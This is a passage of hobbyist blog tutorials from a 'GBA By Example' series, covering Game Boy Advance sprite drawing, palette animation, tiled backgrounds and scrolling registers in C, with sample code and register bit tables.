    const uint16 keys[] = {KEY_A, KEY_B, KEY_SELECT,
                          KEY_START, KEY_RIGHT, KEY_LEFT,
                          KEY_UP, KEY_DOWN, KEY_L, KEY_R};

    int idx = 0;
    for (int i = 0; i < 10; ++i)
    {
        if (keys[i] == key_code)
        {
            idx = i;
            break;
        }
    }

    volatile ObjectAttributes *spriteAttribs = &MEM_OAM[0];
    spriteAttribs->attr0 = 0x602F;
    spriteAttribs->attr1 = 0xC04F;
    spriteAttribs->attr2 = idx * 32 * 2;

}

And then move the sprite off screen when we don’t want to draw any text at all:

void ClearSprite()
{
    volatile ObjectAttributes *spriteAttribs = &MEM_OAM[0];
    spriteAttribs->attr0 = 0x60AF;
}

Animating Palette Information

In addition to drawing a sprite, let’s animate our background. You’ll notice that the background I created earlier was just a single colour. Since the colours live in palette memory, we can change the colour of the background just by changing the first colour in the background palette.

To make things simpler, I just added the code to change the background colour ot the DrawSprite function from above. There are certainly better / cleaner ways to do this, but for a quick and dirty example, I think the following will do.

void DrawSprite(uint16 key_code)
{
    ...
    const uint16 bgCols[] = {RGB15(16,0,0), RGB15(0,16,0), RGB15(0,0,16),
                            RGB15(16,16,0),RGB15(16,16,16),RGB15(32,16,0),
                            RGB15(32,0,16),RGB15(16,0,32),RGB15(16,32,0),
                            RGB15(32,0,32)};
    MEM_BG_PALETTE[0] = bgCols[idx];
}

Finally, I added a single line to the ClearSprite function:

void ClearSprite()
{
    ...
    MEM_BG_PALETTE[0] = 0;
}

You can do a lot of interesting things by modifying palettes directly, like having parts of sprites flash when hit, or having different enemies use the same sprite but use different colours (like the old Legend of Zelda games did with red / blue enemies). What I’ve done here is the simplest possible example of doing something like that, but it’s effective nonetheless.

Putting It All Together

If you’re still with me, the hard part is over, and all that’s left is to write out the main function for our program, and make sure all the necessary #defines are there for things to work together.

//previous code from article omitted for brevity

#define VIDEOMODE_0    0x0000
#define ENABLE_OBJECTS 0x1000
#define MAPPINGMODE_1D 0x0040
#define BACKGROUND_0   0x0100
#define REG_DISPLAYCONTROL     *((volatile uint16*)(0x04000000))
#define REG_VCOUNT             *((volatile uint16*)(0x04000006))

inline void vsync()
{
  while (REG_VCOUNT >= 160);
  while (REG_VCOUNT < 160);
}

int main()
{
    CreateBackground();
    LoadTileData();

    REG_DISPLAYCONTROL =  VIDEOMODE_0 | ENABLE_OBJECTS | BACKGROUND_0 | MAPPINGMODE_1D;
    key_poll();
    ClearSprite();

    while(1)
    {
        vsync();
        key_poll();

        const uint16 keys[] = {KEY_A, KEY_B, KEY_SELECT,
                                KEY_START, KEY_RIGHT, KEY_LEFT,
                                KEY_UP, KEY_DOWN, KEY_L, KEY_R};
        ClearSprite();
        for (int i = 0; i < 10; ++i)
        {
            if (getKeyState(keys[i]))
            {
                DrawSprite(keys[i]);
            }
        }
    }

    return 0;
}

If you want to grab a fully put-together, runnable version of the code, you can find it here, I’m going to omit it here because all the code is already available on this page, and I think a github repo is a far better delivery mechanism for that much code than pasting it here.

This has the disadvantage of only showing one key press at a time (and prioritizing some keys over others), but I’m ok with that, I just wanted a fun example program to show off input handling, and to provide more examples of how to use stuff we’ve done in articles past. I suppose modifying the above to show all the buttons that are currently pressed instead of one is left as an exercise to the reader? ;)

Conclusion

That’s it for this week! I’m kind of excited that we’ve covered enough ground that I can throw up some code and refer to previous articles instead of having to explain every line, but if that ended up being unclear today make sure to let me know via reddit or twitter, or wherever so I can adjust future articles.

Finally, As much fun as pumping these articles out every week is, I’m going to slow down a bit and do one every two weeks , so that I have more time for some other hobby projects. We’ve covered enough ground now that there’s no reason to wait around for me to post more before starting to build the GBA game of your dreams though, so get to it!

And as always, if you want to say hello, or ask questions, or point out mistakes I’ve made, I’m most easily reached on Twitter.

GBA By Example - Drawing and Moving Backgrounds

2017-04-11T00:00:00+00:00

(Note: This is Part 3 of my GBA by Example series. A list of my other GBA tutorials can be found here)

It’s Tuesday, which means it’s the arbitrary day of the week I chose to post GBA stuff!

Last week we got a sprite on the screen and moving around in a tiled video mode, but it still left our screen looking a little bit bare. This week we’re going to rectify that, and figure out how to work with Backgrounds! You can make really great looking stuff with backgrounds, or you can do what I did, and make something that looks like this:

This is two backgrounds (one gradient, and one checkerboard), overlapping one another, and moving in opposite directions. Snazzy eh? Today we’re going to cover the absolute minimum you need to know to make something like that.

To kick things off, let’s take a look at what a background actually is on the GBA:

Introducing Backgrounds

Like Sprites, Backgrounds are rectangular collections of tiles. Unlike Sprites, they can be really, really big (relatively speaking). If you recall from last week, the largest sprite we can make is 64x64 pixels. Backgrounds can be up to 1024x1024 if we want them to. Since we only have 96k of VRAM on the GBA (and 32k of that is for Sprites), it stands to reason that to fit all our background data in, they look a bit different from Sprites in memory.

Just like with Sprites, all colours in a Background come from a Palette, which is a collection of up to 256 different colours, each stored as a 16 bit unsigned integer. Colours on the GBA are stored with 5 bits per channel, with the highest bit ignored, like this:

inline uint16 MakeCol(uint32 red, uint32 green, uint32 blue)
{
    return red | (green<<5) | (blue<<10);
}

In code, a Palette might be defined like so:

const unsigned short bgPal[4] __attribute__((aligned(4)))=
{
    0x4DA0,0x0000,0xFFFF,0x001F
};

One thing that hasn’t been mentioned in previous articles is that pixels that use the colour at index 0 are treated as transparent, so you only see the index 0 colour if nothing else gets drawn on top of that pixel. This will be important for us today because we’re going to overlap two backgrounds on top of each other.

A Background’s tiles are the same as a Sprite’s: 8x8 rectangular collections of indices, with each of these storing an index from the palette array. Backgrounds use a separate colour palette from sprites, so you can use an entirely different set of colours for your backgrounds than you do for other stuff in your game. This palette memory, just like with sprites, is large enough to store 256 colours. Since we can only have 256 possible values, tiles store each pixel as an 8 bit index. Tiles are laid out row by row, from top to bottom.

In code, that might look like this:

const unsigned short bgTiles[64] __attribute__((aligned(4)))=
{
    0x0101,0x0202,0x0101,0x0202,0x0101,0x0202,0x0101,0x0202,
    ...
};

If you store your tile data in values larger than uint8s, like I did above, remember that the lowest byte in a value is the leftmost pixel.

All of that should be familiar to you if you read last week’s post, but unlike with Sprites, the order of the tiles doesn’t matter when we’re working with backgrounds. This is because backgrounds want to re-use tiles as much as possible. To accomplish this, backgrounds use a third data structure, called a Screen Block, which is a collection of indices into tile memory: One 16 bit value for every 8x8 tile that the background uses.

Screen Blocks are always 32x32 in size, but each of these values represents an 8x8 tile, meaning that backgrounds are made up of one or more blocks of 256x256 pixels.

In code, a Screen Block might look something like this:

const unsigned short checkerBg[1024] =
{
    0x0001,0x0001,0x0001,0x0000,0x0000,0x0000,0x0000,0x0000,
    0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,
    0x0000,0x0000,0x000A,0x001D,0x0000,0x0000,0x0000,0x0000,
    0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,

    0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,
    0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,
    0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,
    0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,0x0000,

    //continue for another 30 rows

As seen here, Screen Blocks are defined row by row, top to bottom, each value representing the index of a tile. When you’re working with 8bpp tiles, this is all there is to it. There’s more to think about in 4bpp mode, but since this is the first time we’re doing anything with bacgkrounds, let’s keep it simple and continue working in 8bpp mode.

The last thing to know is that we can only have between 0 and 4 backgrounds working at the same time. Yay hardware limitations!

This was a lot of theory, and I want to switch gears now and start to build some stuff, but just to recap:

A Background is a rectangular collection of 8x8 tiles
Tiles are stored as arrays of indices into palette memory
To decide which tile goes where, Backgrounds use Screen Blocks, which are 32x32 arrays of indices into tile memory
A Background consists of one or more Screen Blocks
We can use between 0 and 4 backgrounds at any given time

Alright, let’s start putting this into practice!

My Data:

Because Screen Blocks are so large, I’ve uploaded the data (including tiles and palette) that I’m going to use today to github instead of just including it here.

That gist contains all the information needed to get our first background (the checkerboard) onto the screen. We’ll generate the gradient background in code below.

Getting Data into VRAM

We know what our data is going to look like, but we haven’t yet covered where it’s going to go. Let’s start with Palette memory, since it’s going to be the most like what we’ve done before.

As mentioned above, Backgrounds use a different palette than Sprites, which naturally means that the background palette is located at a different place in memory:

#include "tiles.h"

#define MEM_BG_PALETTE    ((uint16*)(0x05000000))
#define MEM_OBJ_PALETTE   ((uint16*)(0x05000200))

void UploadPaletteMem()
{
    memcpy(MEM_BG_PALETTE, bgPal, bgPalLen);
}

Perfect, the palette data was easy! Next we need to get our tiles into memory. You may recall from last week that the data for sprite tiles starts at the fifth tile-block in tile memory. This is because the first 4 of those blocks are reserved for backgrounds. So let’s put our tile data into the first one:

typedef uint16 Tile[32];
typedef Tile TileBlock[256];

#define MEM_VRAM                ((volatile uint32*)0x6000000)
#define MEM_TILE                ((TileBlock*)0x6000000)

void UploadTileMem()
{
    memcpy(&MEM_TILE[0][0], bgTiles, bgTilesLen);
}

All of this is almost identical to last week, so let’s start doing something different and get our Screen Block data into memory. Screen blocks share memory with Tile memory. A Screen Block is 2048 bytes, which means that we can fit 8 of them into a single tile-block. It’s up to us to make sure that we don’t try to put a Screen Block and tile data into the same spot in memory.

If you’re using the example data, you’ll notice that we only have 2 tiles to upload into memory (a checkerboard tile, and a transparent tile), so it’s safe for us to just go 1 Screen Block away from the start of VRAM:

typedef uint16 ScreenBlock[1024];
#define MEM_SCREENBLOCKS        ((ScreenBlock*)0x6000000)

void UploadScreenBlock()
{
    //checkerBg is the ScreenBlock data from the gist
    memcpy(&MEM_SCREENBLOCKS[1], checkerBg, checkerBgLen);
}

That should about do it for uploading the data we have for our tiles, but I also mentioned that I generated the gradient background in code. Here’s the code for that:

inline uint16 MakeCol(uint32 red, uint32 green, uint32 blue)
{
    return red | (green<<5) | (blue<<10);
}

void GenerateGradient()
{
    //we've uploaded 4 colours to palette memory
    //so make sure we don't overwrite those
    for (uint16 i = 0; i < 32; i++)
    {
        *((uint16*)(MEM_BG_PALETTE+(4+i))) = MakeCol(i,i,i);
    }

    //every tile is 64 palette indices
    //we have 32 grayscale values from above
    uint8 tile[64];
    for (uint16 i = 0; i < 32; ++i)
    {
        for (int j = 0; j < 64; j++)
        {
            tile[j] = 4 + (i);
        }
        memcpy(MEM_TILE[1][i], tile, 64);
    }

    //generate 2 screen blocks,
    //each gray value getting two tiles of width
    for (int block = 0; block < 2; ++block)
    {
        uint16 screenBlock[1024];

        //screen block data is row by row, top to bottom
        for (uint16 i = 0; i < 32; ++i)
        {
            for (uint16 j = 0; j < 32; ++j)
            {
                //each block gets 16 colours, 2 tiles wide for each
                screenBlock[i * 32 + j] =  (j/2) + (block*16);
            }
        }
        memcpy(MEM_SCREENBLOCKS[block+2], &screenBlock[0], 2048);
    }
}

I was torn on whether or not to include this in the post, but I think it’s a good example of another way of working with all the types of memory we’re wrangling to get data on the screen. It also gives us an opportunity to work with a background that uses more than 1 Screen Block, since the gradient is 2 Screen Blocks wide.

If the above code is unclear, that’s ok! I don’t think it was particularly common to generate background data like this anyway. If you want to follow along, just copy and paste the above code and pretend we uploaded that data the same way we did the other data, since it has nothing to do with understanding how the GBA handles backgrounds.

Turning Things On

The hard part is officially over! All that’s left now is to tell the hardware to use the data we’re feeding it, and glue all the snippets we have together.

Let’s talk about our friend the display control register (0x04000000), in addition to doing things like setting a video mode, or enabling objects, this value is also used to enable or disable backgrounds.

We get to work with up to four backgrounds at a time on the GBA, and you can enable them like so:

#define VIDEOMODE_0    0x0000
#define BACKGROUND_0   0x0100
#define BACKGROUND_1   0x0200
#define BACKGROUND_3   0x0400
#define BACKGROUND_4   0x0800

#define REG_DISPLAYCONTROL     *((volatile uint16*)(0x04000000))

int main()
{
    REG_DISPLAYCONTROL = VIDEOMODE_0 | BACKGROUND_0 | BACKGROUND_1;
    return 0;
}

We’re only going to use the first two backgrounds today, but you can turn on all four backgrounds, or only 1 and 3, or any other combination that you want to use.

Also, we’re still in VideoMode_0, this is because it’s the easiest tiled mode to understand, and we (I) still don’t know enough to actually use any of the features in the other tiled modes.

If you’re in a bitmap mode, you need to enable Background 2 in order for anything to appear on the screen, but as far as I know, you can’t actually do anything with it, it’s just a flag needed to make bitmap modes work.

Defining Our Backgrounds

Just like with Sprites (err.. Objects that is), we need to set up a few values to define how the hardware should use our background data. Mercifully, backgrounds are actually much easier to work with than Sprites. They only need a single 16 bit value set.

Since there are only 4 backgrounds, these bits are at constant memory locations:

#define REG_BG0_CONTROL        *((volatile uint16*)(0x04000008))
#define REG_BG1_CONTROL        *((volatile uint16*)(0x0400000A))
#define REG_BG2_CONTROL        *((volatile uint16*)(0x0400000C))
#define REG_BG3_CONTROL        *((volatile uint16*)(0x0400000E))

What each bit in these values means is as follows:

</tr>

BG	0x FEDC BA98 7654 3210
FE	Size (defined below)
D	Ignored today (see Tonc for info)
CBA98	What Screen Block to start at
7	Color mode: (1 for 8bpp, 0 for 4bpp)
6	Ignored today (see Tonc for info)
54	Nothing, empty bits
32	Tile Block to use
10	Z Depth

Just like with Sprites, the sizes for backgrounds use the bits above to select a value from another table, for backgrounds, this table is as follows:

Bits	Size (in Tiles)
00	32x32
01	64x32
10	32x64
11	64x64

Using the above tables, if we wanted to define our first background (the checkerboard), as a 32x32 tile background which uses tiles starting at the first tile block, and uses the second Screen Block (since it’s offset from the start of VRAM to make space for tile memory), we would do the following:

//Size 00, Screen Block 1, Color Mode 1, Tile Block 0, Depth 0
//0000 0001 1000 0000

REG_BG0_CONTROL = 0x0180;

Notice that we want our Z Depth to be 0 as well. The higher this value, the farther back in the drawing order a background is, so a BG at depth 0 will draw on top of backgrounds with any higher values. Since our checkerboard background has the transparent pixels in it, we want it to be drawn on top of whatever will fill in those transparent pixels.

If we put all this together (leaving out the code for the second background), we get:

#include <string.h>
#include "tiles.h"

typedef unsigned char      uint8;
typedef unsigned short     uint16;
typedef unsigned int       uint32;

typedef uint16 ScreenBlock[1024];
typedef uint16 Tile[32];
typedef Tile TileBlock[256];

#define VIDEOMODE_0    0x0000
#define BACKGROUND_0   0x0100

#define REG_DISPLAYCONTROL     *((volatile uint16*)(0x04000000))
#define REG_BG0_CONTROL        *((volatile uint32*)(0x04000008))

#define MEM_VRAM                ((volatile uint32*)0x6000000)
#define MEM_TILE                ((TileBlock*)0x6000000)
#define MEM_SCREENBLOCKS        ((ScreenBlock*)0x6000000)

#define MEM_BG_PALETTE          ((uint16*)(0x05000000))

int main()
{
    //load data
    memcpy(MEM_BG_PALETTE, bgPal, bgPalLen );
    memcpy(&MEM_TILE[0][0], bgTiles, bgTilesLen);
    memcpy(&MEM_SCREENBLOCKS[1], checkerBg, checkerBgLen);

    REG_BG0_CONTROL = 0x0180;// 0000 0001 1000 0000;
    REG_DISPLAYCONTROL =  VIDEOMODE_0 | BACKGROUND_0;

    while(1)
    {
    }
    return 0;
}

And if you run that, you should see:

Which is excellent! We officially have our first background on the screen. Let’s add our second one now. Remember that we used 2 Screen Blocks to hold all the values for this background, and we want them laid out horizontally, so we’ll have a 64x32 background. We want it to be at priority 0, and use the data we populated with the gradient generating code above.

// Size 01, Screen Block 2, Color Mode 1, Tile Block 1, Priority 1
 // 0100 0010 1000 0101
REG_BG1_CONTROL = 0x4285;

If we add the above line, and the required #defines and gradient code to what we have, we get the following (I’ve omitted GenerateGradient() function body for brevity). I promise after this to not paste any more large code blocks into the article :)

#include <string.h>
#include "tiles.h"
#include "bg.h"

typedef unsigned char      uint8;
typedef unsigned short     uint16;
typedef unsigned int       uint32;

typedef uint16 ScreenBlock[1024];
typedef uint16 Tile[32];
typedef Tile TileBlock[256];

#define VIDEOMODE_0    0x0000
#define BACKGROUND_0   0x0100
#define BACKGROUND_1   0x0200

#define REG_DISPLAYCONTROL     *((volatile uint16*)(0x04000000))
#define REG_BG0_CONTROL        *((volatile uint16*)(0x04000008))
#define REG_BG1_CONTROL        *((volatile uint16*)(0x0400000A))

#define MEM_VRAM                ((volatile uint32*)0x6000000)
#define MEM_TILE                ((TileBlock*)0x6000000)
#define MEM_SCREENBLOCKS        ((ScreenBlock*)0x6000000)

#define MEM_BG_PALETTE          ((uint16*)(0x05000000))
#define MEM_PALETTE             ((uint16*)(0x05000200))

inline uint16 MakeCol(uint32 red, uint32 green, uint32 blue)
{
    return red | (green<<5) | (blue<<10);
}

void GenerateGradient();

int main()
{
    //load data
    memcpy(MEM_BG_PALETTE, bgPal, bgPalLen );
    memcpy(&MEM_TILE[0][0], bgTiles, bgTilesLen);
    memcpy(&MEM_SCREENBLOCKS[1], checkerBg, checkerBgLen);

    GenerateGradient();

    REG_BG0_CONTROL = 0x0180;// 0000 0001 1000 0000;
    REG_BG1_CONTROL = 0x4285; // 0100 0010 1000 0101
    REG_DISPLAYCONTROL =  VIDEOMODE_0 | BACKGROUND_0 | BACKGROUND_1;
    while(1)
    {
    }
    return 0;
}

If you compile and run the above (filling in the GenerateGradient function), you should end up with this:

Which is almost exactly what we wanted to end up with when we started! All that’s left is to add some movement, and this is pretty easy to do:

Moving Things Around

In truth, backgrounds don’t really move, your viewport moves over top of the background. This makes sense with 1 background, but it gets a bit abstract when you think about multiple backgrounds moving at once. In essence, all you have to keep in mind is that increasing the X value of the background scrolling register is going to move it to the left, because what you’re doing is actually moving where your screen is to the right. The same is true for the vertical scrolling register.

As you may have guessed from that explanation, each background on the GBA has two additional registers, one for X offset, and one for Y offset. All backgrounds will repeat infinitely as you scroll them, so you can keep incrementing these values at will, without worrying about resetting them when you get to the edge of a background image. These registers are defined as follows:

#define REG_BG0_SCROLL_H       *((volatile uint16*)(0x04000010))
#define REG_BG0_SCROLL_V       *((volatile uint16*)(0x04000012))
#define REG_BG1_SCROLL_H       *((volatile uint16*)(0x04000014))
#define REG_BG1_SCROLL_V       *((volatile uint16*)(0x04000016))
#define REG_BG2_SCROLL_H       *((volatile uint16*)(0x04000018))
#define REG_BG2_SCROLL_V       *((volatile uint16*)(0x0400001A))
#define REG_BG2_SCROLL_H       *((volatile uint16*)(0x0400001C))
#define REG_BG2_SCROLL_V       *((volatile uint16*)(0x0400001E))

These are pretty self explanatory, assign numbers to them to make the corresponding background move. The only weird part about them is that they are Write-Only, so you can’t simply increment the value in one of the registers, nor can you ever read the value in the register, you can just write to it.

Using these registers, it’s trivial to modify our code from earlier to make things scroll. For brevity’s sake, I’m just going to show how to modify the while(1){} section from the above code, rather than paste the whole thing again:

int hScroll = 0;
int h2Scroll = 0;
while(1)
{
    vsync();

    REG_BG0_SCROLL_H = -hScroll;
    REG_BG1_SCROLL_H = h2Scroll;
    h2Scroll +=2;
    hScroll = h2Scroll/3;
}

This is pretty much what you’d expect, background 0 is being assigned a value that is decreasing, which means it should appear to be moving right on the screen (since our viewport is moving left), and vice versa with the gradient background. This matches up with the scroll directions we had at the top of the post. Which is perfect, because that means we’re done!

Conclusion

I suppose I should link you to some tools that can be used to create backgrounds, but I do so only grudgingly, because I don’t think they’re great. Tonc suggests Mappy and MapEd. To be fair, I haven’t written a tile mapping tool so I don’t really have much of a leg to stand on when criticizing these, but I found them rather fiddly to use, which is why I ended up just hand building some really simple ones for this post.

I’d love to hear about better tools for doing this sort of work. I think Tiled might be better, but I don’t know how set up it is for GBA style stuff. In any case, I’d love to hear about what tools might be better on Twitter. See you next week!

GBA By Example - Drawing and Moving Sprites

2017-04-04T00:00:00+00:00

(Note: This is Part 2 of my GBA by Example series. A list of my other GBA tutorials can be found here)

Last week, we were working in video mode 3, which is one of the “bitmap” video modes. These modes are named so because they use the GBA’s 96K of video memory (VRAM) to store a representation of the screen as an array of colour values. If you want to draw to pixel (0,0), you simply set the first element in the screen buffer array to the colour you want, and when the hardware draws, it reads the value at that location, and draws it to the screen.

While some games did use the bitmap modes to do some pretty amazing stuff (like James Bond 007: NightFire and Stuntman), they were the exception, not the rule. Most GBA games that were released were purely 2D, and used what are called Tiled Video Modes, which provide hardware level optimizations for 2D drawing tasks.

So today I’m going to walk through the bare minimum needed to use one of these tiled video modes to draw (and move) a sprite across the screen, which might end up looking like this:

(Forgive the Programmer Art)

Let’s get started!

Introducing Tiled Video Modes

Tiled video modes are different from the bitmap modes because they don’t store large colour arrays in VRAM. Instead, VRAM is used to store collections of tiles (8x8 collections of colour values), and data about how to display these tiles. There are 3 different tiled video modes (mode 0 - mode 2), but I don’t really know enough right now to worry about the differences between them right now to make an informed choice about which one to use. Until that changes, I’m going to work in Mode 0 and kinda plug my ears and try not to think too hard about it:

#define REG_DISPLAYCONTROL     *((volatile uint16*)(0x04000000))

int main()
{
    REG_DISPLAYCONTROL = 0; //mode 0, no background enabled

    while(1){}
    return 0;
}

Since what we store in VRAM has changed since last week, it makes sense that there are a few new data structures that we’re going to have to understand in order to get anything useful into memory (and do anything interesting).

As mentioned, a Tile is an 8x8 collection of colour values (stored linearly, one row after the other), but these colour values are not the colours the sprite will actually use on screen. Instead, these values are used to look up the colour in a Palette, which is another data structure we’re going to have to wrangle today.

A Palette is a block of memory that contains colour values, plain and simple. An application gets 2 of these blocks of memory, one for backgrounds, and one for sprites. Each section is large enough to contain 256 colour values.

Tiles can take the form of 8bpp (bits per pixel), or 4bpp. 8bpp mode is pretty straightforward - we have 8 bits to play with, which means each value in our tile can be one of 256 possible values, which is exactly how many values we can store in a palette. In 4bpp mode, we get up to 16 possible values for each pixel, which means that we can only use a section of our palette memory for each sprite.

Because it sounds easier, and I promised that this article was the bare minimum we needed to draw a sprite, we’re going to use 8bpp today.

Finally, a Sprite is a rectangular collection of tiles, so when we format images to be used on the GBA, we need to break them up into 8x8 tiles, and a palette of colours that those tiles use, and then provide some data about which locations in Tile and Palette memory our sprite will use. It’s important to note that the GBA calls Sprites “Objects” (not the OOP kind). You can split hairs about this, but a GBA Object is a collection of tiles, arranged rectangularly, that move around the screen. Sounds like a Sprite to me.

I’m sure there are reasons why this isn’t true 100% of the time, but those reasons aren’t really important today.

So to wrap this section up:

A Palette is an array of 256 colour values
A Tile’s colour values are actually indices into Palette memory
A Sprite is a (theoretical) rectangular collection of tiles.
The hardware equivalent of a Sprite is called an Object

Hopefully that’s all relatively clear! Let’s start putting all of this together

Working With Sprite Data

The first thing we need to do is to actually have some tile and colour data to use in our program.

For this section, I’m going to simply provide the data that we’re going to use. At the end of this post, I’ll link you to tools that you can use to make your own. To start with, let’s consider a really simple sprite, which consists of only a single tile, and 3 palette colours.

(Grid lines added to help differentiate pixels, not included in sprite)

Here’s what that sprite might look like in our program:

const unsigned int testTiles[16] __attribute__((aligned(4)))=
{
    0x00000000,0x00000000,
    0x00000001,0x00000000,
    0x00000000,0x00000000,
    0x00000000,0x00000000,
    0x00000000,0x00000000,
    0x00000000,0x00000000,
    0x02020102,0x02020202,
    0x00000000,0x00000000,
};

const unsigned int testPal[2] __attribute__((aligned(4)))=
{
    0x03E0001F,0x00007C00,
};

You can see that most of this is what we would expect, the testTiles data traverses each row in order from top to bottom, with each tile index getting 8 bits (2 hex numbers) of data allocated, so each 32 bit value represents 4 pixels. The lowest bits represent the leftmost pixels, which makes sense logically, even if it makes things harder to read when you’re looking at hex values.

The palette data is also as we would expect, containing the three colours used in our sprite, represented as 15 bit colours, with 2 colours per 32 bit value.

The attribute((aligned(4))) is a gcc macro to force your data to be aligned on 4 byte boundaries. I took it straight from the Tonc tutorial, which says:

As of devkitARM r19, there are new rules on struct alignments, which means that structs may not always be word aligned, and in the case of OBJ_ATTR structs (and others), means that [some] struct-copies … will not only be slow, they may actually break. For that reason, I will force word-alignment on many of my structs…

Since I don’t know enough to argue with that right now, I’m taking it on faith that this is still a good idea.

Now that we know what our sprite data is going to look like, let’s use a slightly larger data set. This is mostly to make sure that what we do later is correctly ordering the tiles in our sprite. If we used the example data above, we wouldn’t be able to verify this because we only had 1 tile. Here’s the sprite and data that I’m going to be using for the rest of the article:

const unsigned int spriteTiles[64] __attribute__((aligned(4)))=
{
    0x00000000,0x01000000,0x00000000,0x01010000,0x00000000,0x01010100,0x00000000,0x01010101,
    0x01000000,0x01010101,0x01010000,0x01010101,0x01010100,0x01010101,0x01010101,0x01010101,
    0x00000003,0x00000000,0x00000303,0x00000000,0x00030303,0x00000000,0x03030303,0x00000000,
    0x03030303,0x00000003,0x03030303,0x00000303,0x03030303,0x00030303,0x03030303,0x03030303,
    0x04040404,0x04040404,0x04040400,0x04040404,0x04040000,0x04040404,0x04000000,0x04040404,
    0x00000000,0x04040404,0x00000000,0x04040400,0x00000000,0x04040000,0x00000000,0x04000000,
    0x02020202,0x02020202,0x02020202,0x00020202,0x02020202,0x00000202,0x02020202,0x00000002,
    0x02020202,0x00000000,0x00020202,0x00000000,0x00000202,0x00000000,0x00000002,0x00000000,
};

const unsigned int spritePal[3] __attribute__((aligned(4)))=
{
    0x001E0000,0x03E07FFF,0x00007C1F,
};

If you take a look at this larger sprite data, you’ll notice that it’s stored as a sequential array of 8x8 tiles, that is, the 3rd 32 bit value isn’t the first four pixels of the top right tile, it’s the first four pixels of the second row of the top left tile. This is to make things easier to get into VRAM, since we have to upload tiles, not whole images. Mercifully, there’s a command line tool that I’ll link later that will convert images to this format for us, so we don’t have to try to author images like this.

For readability sake, I’m going to put the above block of code into it’ own .c file, that I’m going to call sprite.c. I’m also going to create sprite.h, which looks like this:

#ifndef SPRITE_H
#define SPRITE_H

#define spriteTilesLen 256 //size in bytes
extern const unsigned int spriteTiles[64];

#define spritePalLen 12
extern const unsigned int spritePal[3];

#endif

I’m using 32 bit values to store everything, because when I tried to use 16 bit values, I ended up needing to pad my sizes in the header to the nearest multiple of 8 (so spritePalLen had to be 16), or else some data wouldn’t transfer. I’m not entirely sure why that is (or why making things ints fixed that), but I decided I’d rather not have to remember to do that, and chose to stick with 32 bit values even though they make the data slightly harder to read.

Getting All This Into VRAM

We have sprite data and palette data ready to go, but as we discussed earlier, we’re going to need to get this data into the proper parts of memory. Specifically, we’ll need to add the palette values to our larger 256 colour palette memory, upload tile data to tile memory, and then create a sprite that references those tiles.

Let’s start with the palette memory:

#include "sprite.h"

typedef unsigned char      uint8;
typedef unsigned short     uint16;
typedef unsigned int       uint32;

#define MEM_PALETTE   ((uint16*)(0x05000200))
void UploadPaletteMem()
{
    memcpy(MEM_PALETTE, spritePal, spritePalLen);

}

This is pretty straightforward, the only thing to note is that in other articles, what I’m calling MEM_PALETTE here is usually called MEM_OBJ_PAL, or something similar. This is because palette memory on the GBA is divided into two sections, but we’re only using one of them today, so for simplicity’s sake, I’m just calling it MEM_PALETTE and pretending that’s all there is to it.

Next we need to upload our tile memory, this is a bit less straightforward:

typedef uint32 Tile[16];
typedef Tile TileBlock[256];

#define MEM_VRAM        ((volatile uint32*)0x06000000)
#define MEM_TILE        ( (TileBlock*)MEM_VRAM )

void UploadTileMem()
{
    memcpy(&MEM_TILE[4][1], spriteTiles, spriteTilesLen);
}

To understand what’s going on here, we need to know a bit more about how tiles are stored in VRAM. In tiled video modes, VRAM is used to store tile data, and that data is arranged in 16kb blocks, called “tile blocks” or (more confusingly) “charblocks.” Since the GBA has 96kb of VRAM, this gives us 6 tile blocks total.

The first four of these tile blocks are reserved for backgrounds (which we aren’t delving into today), and the remainder are for tiles. This means that when we want to put a tile into memory, the first possible memory slot for us is at MEM_VRAM + 64k bytes (or really, + 65536 bytes because of data alignment). This gives us a memory address of 0x6010000, but it’s much easier to get at individual tile addresses using the structs / array notation you see here.

I’m putting my sprite into [4][1] instead of [4][0] because writing into [4][0] ended up putting some weird artifacts on the top left corner of my screen. I’m not sure why that is yet, and I haven’t found another example of using 8bpp sprites online to see what they’re doing, so I’m going to leave it for now (if you know what’s going on, shoot me a message on Twitter).

The last thing we need to get into memory is a description of our sprite (since we need to know how to combine all these tiles we just put into VRAM). To do that, we’re going to define an Object.

GBA Objects Aren’t “Objects”

As mentioned earlier, a GBA Object is NOT an OOP style Object. Instead, they’re simply a collections of tiles which can be transformed / drawn without needing to clear where they were. If you remember from last week, we had to do all our own clearing. Objects relieve us of that duty.

Unfortunately, creating an Object is a bit of an arcane exercise, so bear with me here. The first thing we need to do is to define the Object data structure, and where object memory lives:

typedef struct ObjectAttributes {
    uint16 attr0;
    uint16 attr1;
    uint16 attr2;
    uint16 pad;
} __attribute__((packed, aligned(4))) ObjectAttributes;

#define MEM_OAM  ((volatile ObjectAttributes *)0x07000000)

As you may have guessed from above, you don’t technically store objects in memory (although you’re free to call your struct whatever you want), instead we store what’s referred to as “Object Attributes.” These structs are stored in “Object Attribute Memory”, or OAM.

There’s a lot of information packed into the three uint16 variables in the ObjectAttributes struct, and it’s easy to get lost. In the interest of being the “bare minimum” you need to move a sprite around the screen, I’m only going to talk about the bits that we’re going to use today. If you want a more granular look at things, Tonc does an excellent job at explaining what every bit does.

It’s easiest to describe how these variables work in a table, so here’s attr0

Attr 0	0x FEDC BA98 7654 3210
FE	Shape of Sprite: 00 = Square, 01 = Tall, 10 = Wide
D	Colour Mode: 0 = 4bpp, 1 = 8bpp
C	Not used today
AB	Not used today
89	Not used today
7654 3210	Y Coordinate

Our sprite is an 8bpp, square sprite. Using this table, if we wanted to define a sprite like that, and place it at a Y coordinate of 50, we could do so like this:

volatile ObjectAttributes *spriteAttribs = &MEM_OAM[0];
spriteAttribs->attr0 = 0x2032;

Here’s what we need in Attr1:

Attr 1	0x FEDC BA98 7654 3210
FE	Sprite Size (discussed below)
DCBA98	Not Used Today
7654 3210	X coordinate

Sprite size is weird on the GBA. A sprite can be a maximum of 64x64, but doesn’t necessarily have to be square, meaning that what size your sprite is depends both on the value in FE or Attribute 1, and on the shape you defined in Attribute 0. They work together like this:

	Size 00	Size 01	Size 10	Size 11
Shape 00	8x8	16x16	32x23	64x64
Shape 01	16x8	32x8	32x16	64x32
Shape 10	8x16	8x32	16x32	32x64

